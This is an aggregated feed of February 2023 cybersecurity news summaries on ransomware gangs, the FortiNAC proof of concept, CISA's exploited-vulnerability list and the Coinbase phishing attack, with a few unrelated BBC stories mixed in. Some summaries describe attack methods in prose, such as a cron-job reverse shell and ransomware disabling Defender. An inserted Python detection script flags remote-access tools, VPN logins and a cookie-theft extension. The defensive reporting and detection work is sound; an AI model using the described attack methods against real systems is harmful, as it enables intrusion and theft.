                2023-02-23 https://www.malwarebytes.com/blog/news/2023/02/royal-mail-gives-lockbit-a-lesson-in-ransomware-negotiation

                Categories: News

                The LockBit gang has released a chat history showing its negotiations with Royal Mail.

                (Read more...)

                The post Royal Mail schools LockBit in leaked negotiation appeared first on Malwarebytes Labs.

                "

                Autosummary: A good way to lower the temperature is to adopt the ransomware gang’s self-serving vernacular, he says, and the Royal Mail’s “IT guy” does this in subtle ways, such as referring to LockBit’s criminal activity as “penetration testing.” Legal obligations must be met, law enforcement involved, cyberinsurance rules followed, customers and suppliers informed, and so on. The negotiation began on January 12, 2023, and like any Internet chat, the conversation takes place between two avatars who may or may not be who they say they are. They consistently used language like “I am trying to help our Senior Team understand this,” “I am still trying to work with you here,” “I am doing what I can to drive things forward.” Maybe they did work in IT, but having spent years working in IT myself, and after seeing how the Royal Mail’s representative conducted themselves, I will simply say they aren’t like anyone I ever met. "


                BlackCat ransomware targets another healthcare facility

                exploits ransomware
                2023-02-23 https://www.malwarebytes.com/blog/news/2023/02/lehigh-valley-health-network-targeted-by-blackcat-ransomware

                Categories: News

                Categories: Ransomware

                Tags: Lehigh Valley Health Network

                Tags: LVHN

                Tags: BlackCat

                Tags: ALPHV

                Tags: Noberus

                Tags: ransomware

                Tags: leak site

                Tags: DDoS

                The Lehigh Valley Health Network stated it was the target of a cybersecurity attack by a ransomware gang known as BlackCat

                (Read more...)

                The post BlackCat ransomware targets another healthcare facility appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: February 23, 2023 by The Lehigh Valley Health Network stated it was the target of a cybersecurity attack by a ransomware gang known as BlackCat In a statement issued Monday morning, Lehigh Valley Health Network said it had been the target of a cyberattack attributed to a ransomware gang known as BlackCat. BlackCat The ransomware-as-a-service (RaaS) group BlackCat, also known as ALPHV and Noberus, is currently one of the most active groups, and has been associated with Russia. In December, 2022, the Office of Information Security and Health Sector Cybersecurity Coordination Center issued an extensive Analyst Note which identified BlackCat as a "relatively new but highly-capable" ransomware threat to health care providers. "


                Samsung adds Message Guard protection against zero-click exploits

                exploits
                2023-02-23 https://www.malwarebytes.com/blog/news/2023/02/samsung-adds-message-guard-protection-against-zero-click-exploits

                Categories: Android

                Categories: News

                Tags: Samsung

                Tags: message guard

                Tags: sandbox

                Tags: zero-click exploit

                Tags: images

                Tags: attachments

                Samsung has announced the introduction of Message Guard protection against zero-click exploits for the Samsung Galaxy S23 series.

                (Read more...)

                The post Samsung adds Message Guard protection against zero-click exploits appeared first on Malwarebytes Labs.

                "

                Autosummary: Samsung Message Guard covers the following image formats: PNG, JPG/JPEG, GIF, ICO, WEBP, BMP, and WBMP. Zero-click: Zero-click malware is defined as malware that does not require any user action or input to infect a device or system. "


                Russian women explain why they chose to give birth in Argentina

                latam rusia-ucrania
                2023-02-22 https://www.bbc.co.uk/news/world-latin-america-64722803?at_medium=RSS&at_campaign=KARANGA
                Thousands of pregnant Russian women are travelling to Argentina despite having no links to the country. "

                Autosummary: "


                Most vulnerabilities associated with ransomware are old

                exploits ransomware
                2023-02-22 https://www.helpnetsecurity.com/2023/02/22/vulnerabilities-ransomware-old/

                Researchers identified 56 new vulnerabilities associated with ransomware threats among a total of 344 threats identified in 2022 – marking a 19% increase year-over-year. Threat actors are actively searching the internet and deep and dark web for 180 vulnerabilities known to be associated with ransomware. In the last quarter of 2022, these groups used ransomware to exploit 21 of these vulnerabilities, according to a new report from Cyber Security Works (CSW), Ivanti, Cyware, and Securin. … More

                The post Most vulnerabilities associated with ransomware are old appeared first on Help Net Security.

                "

                Autosummary: In the last quarter of 2022, these groups used ransomware to exploit 21 of these vulnerabilities, according to a new report from Cyber Security Works (CSW), Ivanti, Cyware, and Securin. "


                Resecurity warns about cyber-attacks on data center service providers

                Telcos
                2023-02-22 https://www.helpnetsecurity.com/2023/02/22/resecurity-warns-about-cyber-attacks-on-data-center-service-providers/

                Resecurity warns about the increase of malicious cyber activity targeting data center service providers globally. According to the detailed report recently released by the California-based cybersecurity company, during September 2021, Resecurity notified several data center organizations about malicious cyber activity targeting them and their customers. Such organizations act as a critical part of the enterprise supply chain and become a juicy target for nation-state, criminal and cyberespionage groups. The details about this activity have been … More

                The post Resecurity warns about cyber-attacks on data center service providers appeared first on Help Net Security.

                "

                Autosummary: Most organizations identified in the leaked data sets relate to financial institutions (FIs) with a global presence, investment funds, biomedical research companies, technology vendors, e-commerce, online marketplaces, cloud services, ISPs and CDN providers with HQ in the U.S, the U.K, Canada, Australia, New Zealand, Singapore and China. Once the customer credentials were collected, the actor performed active probing to the customer panels aiming to collect information about the representatives of enterprise customers who manage operations at the data center, list of purchased services, and deployed equipment. "


                VMware Patches Critical Vulnerability in Carbon Black App Control Product

                exploits
                2023-02-22 https://thehackernews.com/2023/02/vmware-patches-critical-vulnerability.html
                VMware on Tuesday released patches to address a critical security vulnerability affecting its Carbon Black App Control product. Tracked as CVE-2023-20858, the shortcoming carries a CVSS score of 9.1 out of a maximum of 10 and impacts App Control versions 8.7.x, 8.8.x, and 8.9.x. The virtualization services provider describes the issue as an injection vulnerability. Security researcher Jari


                Seattle becomes first US city to ban caste discrimination

                government
                2023-02-22 https://www.bbc.co.uk/news/world-us-canada-64727735?at_medium=RSS&at_campaign=KARANGA
                But a Hindu advocacy group says the ordinance "unfairly singles out and targets an entire community".


                Are your IoT devices at risk? Cybersecurity concerns for 2023

                industry ciber
                2023-02-22 https://www.helpnetsecurity.com/2023/02/22/iot-devices-cybersecurity-risk-2023-video/

                In this Help Net Security video, J.R. Cunningham, CSO at Nuspire, discusses IoT cybersecurity concerns for 2023. With homes becoming increasingly connected and reliant on smart technology, the potential for cybercriminals to exploit vulnerabilities and wreak havoc is higher than ever before. Although we have new and emerging standards for how connected things talk to each other, such as the Matter standard that IoT companies have agreed to adopt, this could be the year we …


                Threat Actors Adopt Havoc Framework for Post-Exploitation in Targeted Attacks

                exploits
                2023-02-22 https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html
                An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike, Sliver, and Brute Ratel. Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc. "While C2 frameworks are prolific, the


                U.S. Cybersecurity Agency CISA Adds Three New Vulnerabilities in KEV Catalog

                ciber
                2023-02-22 https://thehackernews.com/2023/02/us-cybersecurity-agency-cisa-adds-three.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The list of shortcomings is as follows:
                - CVE-2022-47986 (CVSS score: 9.8) - IBM Aspera Faspex Code Execution Vulnerability
                - CVE-2022-41223 (CVSS score: 6.8) - Mitel MiVoice Connect Code Injection


                VMware addressed a critical bug in Carbon Black App Control

                exploits
                2023-02-22 https://securityaffairs.com/142565/security/vmware-carbon-black-app-control-bug.html

                VMware released security updates to address a critical vulnerability, tracked as CVE-2023-20858, in the Carbon Black App Control product. VMware addressed a critical injection vulnerability (CVSSv3 score 9.1) in Carbon Black App Control. VMware Carbon Black App Control allows organizations to ensure that only trusted and approved software is allowed to execute on their critical […]


                HardBit ransomware tells corporate victims to share their cyber insurance details

                exploits ransomware
                2023-02-22 https://www.tripwire.com/state-of-security/hardbit-ransomware-tells-corporate-victims-share-their-cyber-insurance-details
                A ransomware outfit is advising its victims to secretly tell them how much insurance they have, so their extortion demands will be met. Read more in my article on the Tripwire State of Security blog.

                Autosummary: The cybercriminals behind HardBit even attempt to quash any pangs of guilt an IT administrator or CISO might be having about sharing details of their insurance: "Poor multimillionaire insurers will not starve and will not become poorer from the payment of the maximum amount specified in the contract, because everyone knows that the contract is more expensive than money, so let them fulfill the conditions prescribed in your insurance contract, thanks to our interaction," the ransom note concludes. For example your company is insured for 10 million dollars, while negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for example 100 thousand dollars, we will refuse the paltry amount and ask for example the amount of 15 million dollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars.


                Attackers Flood NPM Repository with Over 15,000 Spam Packages Containing Phishing Links

                financial
                2023-02-22 https://thehackernews.com/2023/02/attackers-flood-npm-repository-with.html
                In what's a continuing assault on the open source ecosystem, over 15,000 spam packages have flooded the npm repository in an attempt to distribute phishing links. "The packages were created using automated processes, with project descriptions and auto-generated names that closely resembled one another," Checkmarx researcher Yehuda Gelb said in a Tuesday report. "The attackers referred to retail


                CISA adds IBM Aspera Faspex and Mitel MiVoice to Known Exploited Vulnerabilities Catalog

                exploits
                2023-02-22 https://securityaffairs.com/142574/security/known-exploited-vulnerabilities-catalog-bugs.html

                US CISA added actively exploited flaws in IBM Aspera Faspex and Mitel MiVoice to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities Catalog: CVE-2022-47986 (CVSS score: 9.8) – IBM Aspera Faspex Code Execution Vulnerability – A remote attacker can trigger the vulnerability to execute arbitrary code on […]


                New S1deload Stealer malware hijacks Youtube, Facebook accounts

                exploits
                2023-02-22 https://www.bleepingcomputer.com/news/security/new-s1deload-stealer-malware-hijacks-youtube-facebook-accounts/
                An ongoing malware campaign targets YouTube and Facebook users, infecting their computers with a new information stealer that will hijack their social media accounts and use their devices to mine for cryptocurrency. [...]

                Autosummary: Unlike S1deload Stealer, the Stealc malware is distributed via fake cracked software, a highly popular tactic also used to push other info stealers like Vidar, Redline, Raccoon, and Mars.


                Experts found a large new class of bugs ‘class’ in Apple devices

                exploits
                2023-02-22 https://securityaffairs.com/142581/security/apple-three-vulnerabilities.html

                Tech giant Apple discloses three new vulnerabilities affecting its iOS, iPadOS, and macOS operating systems. Apple updated its advisories by adding three new vulnerabilities, tracked as CVE-2023-23520, CVE-2023-23530 and CVE-2023-23531, that affect iOS, iPadOS, and macOS. An attacker can trigger the CVE-2023-23530 flaw to execute arbitrary code out of its sandbox or with certain elevated privileges. The vulnerability resides in the Foundation […]


                Hackers use fake ChatGPT apps to push Windows, Android malware

                exploits
                2023-02-22 https://www.bleepingcomputer.com/news/security/hackers-use-fake-chatgpt-apps-to-push-windows-android-malware/
                Threat actors are actively exploiting the popularity of OpenAI's ChatGPT AI tool to distribute Windows malware, infect Android devices with spyware, or direct unsuspecting victims to phishing pages. [...]

                Autosummary: Two examples highlighted in the report are "chatGPT1," which is an SMS billing fraud app, and "AI Photo," which contains the Spynote malware, which can steal call logs, contact lists, SMS, and files from the device.


                Google paid $12 million in bug bounties to security researchers

                exploits
                2023-02-22 https://www.bleepingcomputer.com/news/security/google-paid-12-million-in-bug-bounties-to-security-researchers/
                Google last year paid its highest bug bounty ever through the Vulnerability Reward Program for a critical exploit chain report that the company valued at $605,000. [...]

                Autosummary: The biggest payout was for a report detailing an exploit chain of five bugs (CVE-2022-20427, CVE-2022-20428, CVE-2022-20454, CVE-2022-20459, CVE-2022-20460) in Android submitted by gzobqq, which was rewarded with $605,000.


                Hackers now exploit critical Fortinet bug to backdoor servers

                exploits
                2023-02-22 https://www.bleepingcomputer.com/news/security/hackers-now-exploit-critical-fortinet-bug-to-backdoor-servers/
                Threat actors are targeting Internet-exposed Fortinet appliances with exploits targeting CVE-2022-39952, an unauthenticated file path manipulation vulnerability in the FortiNAC webserver that can be abused for remote command execution. [...]


                Hackers blamed after Russian radio stations play warnings of missile strikes and air raids

                rusia-ucrania
                2023-02-22 https://grahamcluley.com/hackers-russian-radio-missile-strikes-and-air-raids/
                Russian media has blamed hackers after commercial radio stations in the country broadcast bogus warnings about air raids and missile strikes, telling listeners to head to shelters.


                Scott Lundgren and John Spiliotis join NetSPI Board of Directors

                industry
                2023-02-22 https://www.helpnetsecurity.com/2023/02/23/netspi-board-of-directors/

                NetSPI has appointed Scott Lundgren and John Spiliotis to its Board of Directors. The two veteran security industry executives will support the company’s next stage of growth following a year of record momentum. “We’re honored to have Scott and John join our Board during such an exciting, pivotal time for NetSPI,” said Aaron Shilts, CEO of NetSPI. “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the …

                Autosummary: “Their proven track records of building and advising high-growth cybersecurity companies, combined with their passion for empowering the next generation of business leaders, will be invaluable as we continue to innovate and scale,” Shilts added.


                Writing like a boss with ChatGPT and how to get better at spotting phishing scams

                financial
                2023-02-22 https://www.welivesecurity.com/2023/02/22/chatgpt-level-up-phishing-defenses/

                It’s never been easier to write a convincing message that can trick you into handing over your money or personal data

                Autosummary: It may, for example, be your bank asking to confirm personal and financial details via email or text, which an actual bank will never do. These developments might put the ability to launch large-scale, persuasive, error-free and even targeted cyberattacks and scams such as business email compromise (BEC) fraud into the hands of far more people than ever before. Needless to say, the victim never receives their iPhone, gift card, money or any other item they were promised. Avoid clicking on links, downloading files or opening attachments in messages even if they appear to be from a known, trusted source – unless you have verified with the sender via other channels that the message is authentic.


                Brazil landslides: Dozens missing, feared buried in the mud

                latam
                2023-02-22 https://www.bbc.co.uk/news/world-latin-america-64739626?at_medium=RSS&at_campaign=KARANGA
                More than 40 people have been killed in landslides which hit coastal towns in Brazil's São Paulo state.


                ChatGPT is bringing advancements and challenges for cybersecurity

                ciber
                2023-02-21 https://www.helpnetsecurity.com/2023/02/21/chatgpt-cybersecurity-challenges/

                Understanding why ChatGPT is garnering so much attention takes a bit of background. Up until recently, AI models have been quite “dumb”: they could only respond to specific tasks when trained on a large dataset providing context on what to find. But, over the last five years, research breakthroughs have taken AI to a whole new level, enabling computers to better understand the meaning behind words and phrases. Leveraging these mechanics and 5 large language …

                Autosummary: In theory, ChatGPT and similar AI models should help close the cybersecurity talent shortage by making individual security professionals significantly more effective – so much so, in fact, that with AI, one person will be able to accomplish the same output as multiple individuals before. Ready or not, here it comes: Whether we like it or not, ChatGPT and next-generation AI models are here to stay, which presents us with a choice: we can be afraid of the change and what’s to come, or we can adapt to it and ensure we embrace it holistically by implementing both an offensive and defensive strategy.


                Researchers Warn of ReverseRAT Backdoor Targeting Indian Government Agencies

                government
                2023-02-21 https://thehackernews.com/2023/02/researchers-warn-of-reverserat-backdoor.html
                A spear-phishing campaign targeting Indian government entities aims to deploy an updated version of a backdoor called ReverseRAT. Cybersecurity firm ThreatMon attributed the activity to a threat actor tracked as SideCopy. SideCopy is a threat group of Pakistani origin that shares overlaps with another actor called Transparent Tribe. It is so named for mimicking the infection chains associated


                What can we learn from the latest Coinbase cyberattack?

                ciber
                2023-02-21 https://www.helpnetsecurity.com/2023/02/21/coinbase-cyberattack/

                Cryptocurrency exchange Coinbase has fended off a cyberattack that might have been mounted by the same attackers that targeted Twilio, Cloudflare and many other companies last year. Leveraging smishing and vishing, the attackers tried to trick Coinbase employees into sharing login credentials and installing remote desktop applications, and were only partly successful: the company’s incident response team quickly reacted to “unusual activity” alerts and, in the end, the attackers were unable to access customer information …

                Autosummary: Attempted access to company assets from a third party VPN provider; phone calls or text messages from services like Google Voice, Skype, Vonage (formerly Nexmo), etc. “As a network defender you should expect to see login attempts to corporate applications from VPN services (e.g. Mullvad), using stolen credentials, cookies, or other session tokens.


                The Future of Network Security: Predictive Analytics and ML-Driven Solutions

                industry
                2023-02-21 https://thehackernews.com/2023/02/the-future-of-network-security.html
                As the digital age evolves and continues to shape the business landscape, corporate networks have become increasingly complex and distributed. The amount of data a company collects to detect malicious behaviour constantly increases, making it challenging to detect deceptive and unknown attack patterns and the so-called "needle in the haystack". With a growing number of cybersecurity threats,

                Autosummary: The truth is ML-powered security solutions are bringing about a significant transformation in network security by providing security teams with numerous benefits and enhancing the overall threat detection capabilities of organizations: Big data analytics: With the ever-increasing amount of data and different log sources, organisations must be able to process vast amounts of information in real-time, including network traffic logs, endpoints, and other sources of information related to cyber threats. The Role of ML-Driven Network Security Solutions: ML-driven network security solutions in cybersecurity refer to the use of self-learning algorithms and other predictive technologies (statistics, time analysis, correlations etc.) to automate various aspects of threat detection.


                Coinbase Employee Falls for SMS Scam in Cyber Attack, Limited Data Exposed

                financial
                2023-02-21 https://thehackernews.com/2023/02/coinbase-employee-falls-for-sms-scam-in.html
                Popular cryptocurrency exchange platform Coinbase disclosed that it experienced a cybersecurity attack that targeted its employees. The company said its "cyber controls prevented the attacker from gaining direct system access and prevented any loss of funds or compromise of customer information." The incident, which took place on February 5, 2023, resulted in the exposure of a "limited amount of

                Autosummary: The incident, which took place on February 5, 2023, resulted in the exposure of a "limited amount of data" from its directory, including employee names, e-mail addresses, and some phone numbers.


                Resecurity warns about cyber-attacks on data center service providers

                Telcos
                2023-02-21 https://securityaffairs.com/142531/hacking/attacks-data-center-service-providers.html

                Resecurity warns about the increase of malicious cyber activity targeting data center service providers globally. According to the detailed report recently released by the California-based cybersecurity company, during September 2021, Resecurity notified several data center organizations about malicious cyber activity targeting them and their customers. Such organizations act as a critical part of the enterprise […]

                Autosummary: Most organizations identified in the leaked data sets relate to financial institutions (FIs) with a global presence, investment funds, biomedical research companies, technology vendors, e-commerce, online marketplaces, cloud services, ISPs and CDN providers with HQ in the U.S., the U.K., Canada, Australia, New Zealand, Singapore and China.


                An Overview of the Global Impact of Ransomware Attacks

                exploits ransomware
                2023-02-21 https://www.bleepingcomputer.com/news/security/an-overview-of-the-global-impact-of-ransomware-attacks/
                With ransomware attacks disrupting businesses and governments worldwide, we take a look at the latest findings in a recent ransomware report. [...]

                Autosummary: In the incident of the Royal Mail ransomware, the LockBit hacker set a ransom of $80m, which they claimed was equal to 0.5% of the company’s revenue, in exchange for decrypting the files. Changing Tactics in Ransomware Attacks: Ransomware is malicious software that encrypts a company’s data, preventing access to data until the ransom payment is paid and a decryptor is released.


                PoC exploit, IoCs for Fortinet FortiNAC RCE released (CVE-2022-39952)

                exploits
                2023-02-21 https://www.helpnetsecurity.com/2023/02/21/cve-2022-39952-poc/

                Horizon3.ai’s Attack Team has released a PoC exploit for CVE-2022-39952, a critical vulnerability affecting FortiNAC, Fortinet’s network access control solution. “Similar to the weaponization of previous archive vulnerability issues that allow arbitrary file write, we use this vulnerability to write a cron job to /etc/cron.d/payload. This cron job gets triggered every minute and initiates a reverse shell to the attacker,” shared Zach Hanley, Chief Attack Engineer at Horizon3.ai. “We first create a zip that contains …


                HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost

                exploits ransomware
                2023-02-21 https://securityaffairs.com/142538/cyber-crime/hardbit-ransomware-insurance.html

                Recently emerged HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost. The HardBit ransomware group first appeared on the threat landscape in October 2022, but unlike other ransomware operations, it doesn’t use a double extortion model at this time. The gang threatens victims of further attacks if their ransom […]

                Autosummary: To prevent Windows Defender Antivirus from blocking the ransomware process, it makes several Windows Registry changes to disable many Windows Defender features (i.e. tamper protection, anti-spyware capabilities, real-time behavioral monitoring, real-time on-access (file) protection, and real-time process scanning).


                Brazil landslides: Dozens missing, feared buried in mud

                latam
                2023-02-21 https://www.bbc.co.uk/news/world-latin-america-64724251?at_medium=RSS&at_campaign=KARANGA
                Entire hillsides collapsed onto homes after record rainfall hit towns on the coast east of São Paulo.


                Dani Alves: Brazilian kept in jail over sexual assault allegation after court rejects bail request

                latam
                2023-02-21 https://www.bbc.co.uk/sport/football/64717692?at_medium=RSS&at_campaign=KARANGA
                Brazil defender Dani Alves has a request to be released from jail rejected by a Spanish court as an investigation into an alleged sexual assault continues.


                Activision confirms data breach exposing employee and game info

                financial
                2023-02-21 https://www.bleepingcomputer.com/news/security/activision-confirms-data-breach-exposing-employee-and-game-info/
                Activision has confirmed that it suffered a data breach in December 2022 after one of its employees fell victim to an SMS phishing attack, giving hackers access to its internal systems. [...]


                Exploit released for critical Fortinet RCE flaws, patch now

                exploits
                2023-02-21 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-fortinet-rce-flaws-patch-now/
                Security researchers have released a proof-of-concept exploit for a critical-severity vulnerability (CVE-2022-39952) in Fortinet's FortiNAC network access control suite. [...]

                Autosummary: [Image: Comparison between vulnerable and patched versions (Horizon3)] The bash script executes the "unzip" command on the newly written file, but just before that, the script calls "cd /". [Image: The executed bash script (Horizon3)] "Unzip will allow placing files in any paths as long as they do not traverse above the current working directory," Horizon3 explains.


                Mexico's ex-security minister Genaro García Luna convicted of drug trafficking

                latam
                2023-02-21 https://www.bbc.co.uk/news/world-us-canada-64726724?at_medium=RSS&at_campaign=KARANGA
                Genaro García Luna, a key drugs war figure, is found guilty of taking bribes from a drug cartel.


                PoC exploit code for critical Fortinet FortiNAC bug released online

                exploits
                2023-02-21 https://securityaffairs.com/142553/hacking/poc-exploit-code-fortinet-fortinac.html

                Researchers released a proof-of-concept exploit code for the critical CVE-2022-39952 vulnerability in the Fortinet FortiNAC network access control solution. Researchers at Horizon3 cybersecurity firm have released a proof-of-concept exploit for a critical-severity vulnerability, tracked as CVE-2022-39952, in Fortinet’s FortiNAC network access control solution. Last week, Fortinet released security updates to address two critical vulnerabilities in FortiNAC […]

                Autosummary: The affected products are:
                - FortiNAC version 9.4.0
                - FortiNAC version 9.2.0 through 9.2.5
                - FortiNAC version 9.1.0 through 9.1.7
                - FortiNAC 8.8 all versions
                - FortiNAC 8.7 all versions
                - FortiNAC 8.6 all versions
                - FortiNAC 8.5 all versions
                - FortiNAC 8.3 all versions
                The CVE-2022-39952 vulnerability is fixed in FortiNAC 9.4.1 and later, 9.2.6 and later, 9.1.8 and later, and 7.2.0 and later.


                HardBit ransomware tailors ransom to fit your cyber insurance payout

                exploits ransomware
                2023-02-21 https://www.malwarebytes.com/blog/news/2023/02/hardbit-ransomware-tailors-ransom-to-fit-your-cyber-insurance-payout

                We take a look at a ransomware infection which uses a novel approach to payments: asking for the victim's insurance details.

                Autosummary: Although there is no specific information as to how it arrives on a network, once it gets there it performs typical ransomware operations:
                - Encrypts files, branding them with the file’s custom logo
                - Gathers system/network data
                - Reduces overall security of affected systems
                - Disables recovery options and tamper protection, turns off multiple Windows Defender features, and interferes with several other security features including real time monitoring and Windows services related to backups like the Volume Shadow Copy Service.
                If the scammers are told in private what the insurance total is, they’ll be able to ensure their demand for money is A) at the top end limit of the ransom payout scale provided and B) does not go past this limit, so the affected company receives every cent they've paid out. HardBit 2.0: dismantling a device piece by piece. The ransomware, called HardBit 2.0, has been in circulation since sometime around November last year.


                Healthcare data breaches still higher than pre-pandemic levels

                financial
                2023-02-20 https://www.helpnetsecurity.com/2023/02/20/data-breaches-affecting-healthcare-providers/

                The number of data breaches affecting healthcare providers declined in the second half of 2022, consistent with a downward trend over the past two years, according to Critical Insight. Healthcare industry sees a decrease in data breaches: A deeper dive into the data reveals that current breach totals are still higher than pre-pandemic levels; breaches are affecting more individuals; and hackers are shifting tactics to attack weak links in the healthcare system supply chain, most …

                Autosummary: Healthcare organizations must stay vigilant to protect patient data. Breach numbers are down: Total breaches dropped 9% between the first six months of 2022 and the year’s second half, declining since a high-water mark at the height of the pandemic from 393 breaches in the second half of 2020 to 313 in the latest reporting period.


                Cybersecurity takes a leap forward with AI tools and techniques

                ciber
                2023-02-20 https://www.helpnetsecurity.com/2023/02/20/cybersecurity-ai-tools-techniques/

                Scientists have taken a key step toward harnessing a form of artificial intelligence known as deep reinforcement learning, or DRL, to protect computer networks. Autonomous cyber defense framework: When faced with sophisticated cyberattacks in a rigorous simulation setting, deep reinforcement learning was effective at stopping adversaries from reaching their goals up to 95 percent of the time. The outcome offers promise for a role for autonomous AI in proactive cyber defense. Scientists from the Department …

                The post Cybersecurity takes a leap forward with AI tools and techniques appeared first on Help Net Security.


                Autosummary: DRL: decisions in a broad attack space. “An effective AI agent for cybersecurity needs to sense, perceive, act and adapt, based on the information it can gather and on the results of decisions that it enacts,” said Samrat Chatterjee, a data scientist who presented the team’s work. The stages of the attack included tactics of reconnaissance, execution, persistence, defense evasion, command and control, collection and exfiltration (when data is transferred out of the system). “Our goal is to create an autonomous defense agent that can learn the most likely next step of an adversary, plan for it, and then respond in the best way to protect the system,” Chatterjee said.


                Samsung Introduces New Feature to Protect Users from Zero-Click Malware Attacks

                exploits
                2023-02-20 https://thehackernews.com/2023/02/samsung-introduces-new-feature-to.html
                Samsung has announced a new feature called Message Guard that comes with safeguards to protect users from malware and spyware via what's referred to as zero-click attacks. The South Korean chaebol said the solution "preemptively" secures users' devices by "limiting exposure to invisible threats disguised as image attachments." The security feature, available on Samsung Messages and Google



                Lockbit ransomware gang hit the Portuguese municipal water utility Aguas do Porto

                exploits ransomware
                2023-02-20 https://securityaffairs.com/142477/cyber-crime/lockbit-water-utility-aguas-do-porto.html

                The LockBit ransomware gang claims to have hacked Aguas do Porto, a Portuguese municipal water utility company, and is threatening to leak the stolen data. Aguas do Porto is a municipal water utility company that manages the full […]

                The post Lockbit ransomware gang hit the Portuguese municipal water utility Aguas do Porto appeared first on Security Affairs.




                São Paulo: Dozens killed as deadly storms hit Brazilian coast

                latam
                2023-02-20 https://www.bbc.co.uk/news/world-latin-america-64701062?at_medium=RSS&at_campaign=KARANGA
                Torrential rains plunge entire neighbourhoods under water and trigger landslides in São Paulo state.



                Coinbase cyberattack targeted employees with fake SMS alert

                ciber
                2023-02-20 https://www.bleepingcomputer.com/news/security/coinbase-cyberattack-targeted-employees-with-fake-sms-alert/
                Coinbase cryptocurrency exchange platform has disclosed that an unknown threat actor stole the login credentials of one of its employees in an attempt to gain remote access to the company's systems. [...]

                Autosummary: Indicators to watch for include: any downloads or attempted downloads of specific remote desktop viewers, including AnyDesk (anydesk dot com) and ISL Online (islonline[.]com); any attempts to access the organization from a third-party VPN provider, specifically Mullvad VPN; incoming phone calls/text messages from specific providers, including Google Voice, Skype, Vonage/Nexmo, and Bandwidth; and any unexpected attempts to install specific browser extensions, including EditThisCookie. Employees of companies that manage digital assets and have a strong online presence are bound to be targeted by social engineering actors at some point.
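The indicator list above is effectively a small detection rule set. What follows is an added example for this page, not Coinbase's tooling or anything from the BleepingComputer article: it runs those indicators over a few constructed log lines and then correlates hits per user, since any one of them (a VPN login, an extension install) is noisy on its own while several against the same account is what deserves a human look. The log format, field names, user names and the IP address are assumptions made for the example; the indicator values are the ones the summary names.

```python
"""Matching the social-engineering indicators listed above against logs.

Added example for this page, not Coinbase's own detection content.  The
indicator values (remote-access tool domains, VPN provider, telephony
providers, browser extension) are the ones named in the summary; the log
format, field names and every sample line below are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Indicators named in the summary, normalised to lower case.
REMOTE_TOOL_DOMAINS = {"anydesk.com", "islonline.com"}
VPN_PROVIDERS = {"mullvad"}
TELEPHONY_PROVIDERS = {"google voice", "skype", "vonage", "nexmo", "bandwidth"}
EXTENSION_NAMES = {"editthiscookie"}

# Constructed sample log: "<event> key=value key=value ..." (values may contain spaces).
SAMPLE_LOG = """\
proxy user=alice host=anydesk.com path=/download/AnyDesk.exe status=200
proxy user=bob host=docs.example.com path=/handbook status=200
vpn_login user=alice src_ip=203.0.113.7 provider=Mullvad result=denied
telephony user=carol direction=inbound carrier=Google Voice number=+14155550123
extension user=alice action=install name=EditThisCookie browser=chrome
proxy user=dave host=cdn.islonline.com path=/isl-light.exe status=200
"""

# key=value pairs; a value runs until the next " key=" or end of line.
_KV = re.compile(r"(\w+)=(.+?)(?=\s\w+=|$)")


@dataclass(frozen=True)
class Alert:
    rule: str
    user: str
    evidence: str


def parse_line(line: str) -> tuple[str, dict[str, str]]:
    """Split 'event k=v k=v' into the event name and a field dict."""
    event, _, rest = line.strip().partition(" ")
    return event, {k: v for k, v in _KV.findall(rest)}


def _domain_matches(host: str, domains: set[str]) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def match_event(event: str, f: dict[str, str]) -> Alert | None:
    """Apply the rule for one event type; None when nothing matched."""
    user = f.get("user", "?")
    if event == "proxy" and _domain_matches(f.get("host", ""), REMOTE_TOOL_DOMAINS):
        return Alert("remote_tool_download", user, f["host"] + f.get("path", ""))
    if event == "vpn_login" and f.get("provider", "").lower() in VPN_PROVIDERS:
        return Alert("third_party_vpn", user, f["provider"])
    if event == "telephony" and f.get("direction") == "inbound":
        carrier = f.get("carrier", "").lower()
        if any(p in carrier for p in TELEPHONY_PROVIDERS):
            return Alert("telephony_provider", user, f["carrier"])
    if (event == "extension" and f.get("action") == "install"
            and f.get("name", "").lower() in EXTENSION_NAMES):
        return Alert("extension_install", user, f["name"])
    return None


def detect(log_text: str) -> list[Alert]:
    """Run every rule over every non-empty line, in order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        hit = match_event(*parse_line(line))
        if hit:
            alerts.append(hit)
    return alerts


def escalate(alerts: list[Alert], min_rules: int = 2) -> dict[str, set[str]]:
    """Users who tripped at least `min_rules` distinct rules; those get a human look."""
    by_user: dict[str, set[str]] = defaultdict(set)
    for a in alerts:
        by_user[a.user].add(a.rule)
    return {u: r for u, r in by_user.items() if len(r) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(f"{a.rule:22} {a.user:8} {a.evidence}")
    print("escalate:", escalate(found))
```

In the constructed sample, alice trips three distinct rules (remote-tool download, third-party VPN, extension install) and is the only user `escalate` returns; carol and dave each trip one and stay at alert level. In a real deployment the telephony and extension feeds would come from different systems, so the correlation step needs a common user key and a time window, which the example leaves out.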


                Google Reveals Alarming Surge in Russian Cyber Attacks Against Ukraine

                rusia-ucrania
                2023-02-20 https://thehackernews.com/2023/02/google-reveals-alarming-surge-in.html
                Russia's cyber attacks against Ukraine surged by 250% in 2022 when compared to two years ago, Google's Threat Analysis Group (TAG) and Mandiant disclosed in a new joint report. The targeting, which coincided and has since persisted following the country's military invasion of Ukraine in February 2022, focused heavily on the Ukrainian government and military entities, alongside critical

